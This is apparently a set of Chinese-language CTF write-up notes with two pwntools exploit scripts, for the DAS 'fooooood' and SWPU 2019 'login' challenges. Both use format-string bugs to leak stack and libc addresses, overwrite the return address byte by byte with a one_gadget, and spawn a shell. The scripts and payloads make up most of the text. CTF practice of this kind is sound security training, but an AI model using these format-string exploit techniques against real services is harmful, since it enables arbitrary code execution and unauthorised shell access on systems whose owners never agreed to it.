DAS 6月赛fooooood:
非栈上格式化字符串,但是只有3次有效输入机会,找跳板(1->2->3->value)可以用两次输入写掉栈上i的值为一个大值从而实现多次输入,后面就是非栈上格式化字符串标准打法,劫持ret可以打rop也可以打one_gadget
exp:
from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])
# context(log_level='debug')
# io=remote("node4.buuoj.cn",25718)
io=process("./pwn")
elf=ELF("./pwn")
libc=ELF("./libc-2.23.so")
def sd(cc):
io.sendlineafter(b"what's your favourite food: ", cc)
io.recvuntil(b"Give me your name:")
payload=b"/bin/sh\x00"
io.sendline(payload)
io.recvuntil(b"what's your favourite food: ")
payload="%11$p.%9$p"
io.sendline(payload)
gdb.attach(io)
pause()
io.recvuntil(b"like ")
stack=int(io.recv(14),16)
stack0=stack-0xd0
ret_addr=stack0-0x10
rr=stack0+0xe0
# canary=int(io.recv(18),16)
io.recvuntil(b".")
libc_addr=int(io.recv(14),16)-240-libc.sym[b"__libc_start_main"]
print("stack: "+hex(stack))
print("stack0: "+hex(stack0))
print("libc_addr: "+hex(libc_addr))
one_gadget=[0x45226,0x4527a,0xf03a4,0xf1247]
shell=one_gadget[3]+libc_addr
sys_addr=libc.sym[b"system"]+libc_addr
off0=(stack0-0x24)&0xffff
payload = "%{}c%{}$hn".format(off0,11)
sd(payload)
sd('%100'+'c%37$hhn') #修改i值,增加循环次数
# off1=(off0+0xc+0x8)
off1=ret_addr
def fmt_off(addr,value):
payload = "%{}c%{}$hn".format(addr&0xffff,11)
sd(payload)
payload="%{}c%{}$hhn".format(value&0xff,37)
sd(payload)
for i in range(4):
payload = "%{}c%{}$hhn".format((addr+1+i)&0xff,11)
sd(payload)
payload="%{}c%{}$hhn".format((value>>((i+1)*8))&0xff,37)
sd(payload)
fmt_off(ret_addr,shell) #单字节循环写
for i in range(87):
io.sendline(b"1")
io.interactive()
# 0x45226 execve("/bin/sh", rsp+0x30, environ)
# constraints:
# rax == NULL
# 0x4527a execve("/bin/sh", rsp+0x30, environ)
# constraints:
# [rsp+0x30] == NULL
# 0xf03a4 execve("/bin/sh", rsp+0x50, environ)
# constraints:
# [rsp+0x50] == NULL
# 0xf1247 execve("/bin/sh", rsp+0x70, environ)
# constraints:
# [rsp+0x70] == NULL
SWPU_19_login
7/30复习一下
32位,劫持main函数返回地址为one_gadget
exp:
from pwn import *
# context(log_level='debug',arch='x86',terminal=['tmux','splitw','-h'])
context(terminal=['tmux','splitw','-h'])
io=remote("node1.anna.nssctf.cn",28348)
# io=process("./login")
elf=ELF("./login")
libc=ELF("./libc-2.27.so")
# gdb.attach(io)
# pause()
sh_addr=0x804b080
io.sendafter(b"name: \n",b"/bin/sh\x00")
io.recvuntil(b"word: \n")
# 6 15
payload=b"%6$p.%15$p"
io.send(payload)
io.recvuntil(b"password: ")
stack_addr=int(io.recv(10),16)
io.recvuntil(b".")
leak_addr=int(io.recv(10),16)-241-libc.sym[b"__libc_start_main"]
ret_addr=stack_addr+0x24
shell=leak_addr+0x3cbf7
print("stack_addr: "+hex(stack_addr))
print("ret_addr: "+hex(ret_addr))
print("leak_addr: "+hex(leak_addr))
print("shell: "+hex(shell))
io.recvuntil(b"again!\n")
payload="%{}c%{}$hn".format(ret_addr&0xffff,22)
io.send(payload)
io.recvuntil(b"again!\n")
payload="%{}c%{}$hhn".format(shell&0xff,59)
io.send(payload)
io.recvuntil(b"again!\n")
payload="%{}c%{}$hhn".format((ret_addr+1)&0xff,22)
io.send(payload)
io.recvuntil(b"again!\n")
payload="%{}c%{}$hhn".format((shell>>8)&0xff,59)
io.send(payload)
io.recvuntil(b"again!\n")
payload="%{}c%{}$hhn".format((ret_addr+2)&0xff,22)
io.send(payload)
io.recvuntil(b"again!\n")
payload="%{}c%{}$hhn".format((shell>>16)&0xff,59)
io.send(payload)
io.recvuntil(b"again!\n")
io.send(b"wllmmllw")
io.interactive()
# 0x3cbea execve("/bin/sh", esp+0x34, environ)
# constraints:
# esi is the GOT address of libc
# [esp+0x34] == NULL
# 0x3cbec execve("/bin/sh", esp+0x38, environ)
# constraints:
# esi is the GOT address of libc
# [esp+0x38] == NULL
# 0x3cbf0 execve("/bin/sh", esp+0x3c, environ)
# constraints:
# esi is the GOT address of libc
# [esp+0x3c] == NULL
# 0x3cbf7 execve("/bin/sh", esp+0x40, environ)
# constraints:
# esi is the GOT address of libc
# [esp+0x40] == NULL
# 0x6729f execl("/bin/sh", eax)
# constraints:
# esi is the GOT address of libc
# eax == NULL
# 0x672a0 execl("/bin/sh", [esp])
# constraints:
# esi is the GOT address of libc
# [esp] == NULL
# 0x13573e execl("/bin/sh", eax)
# constraints:
# ebx is the GOT address of libc
# eax == NULL
# 0x13573f execl("/bin/sh", [esp])
# constraints:
# ebx is the GOT address of libc
# [esp] == NULL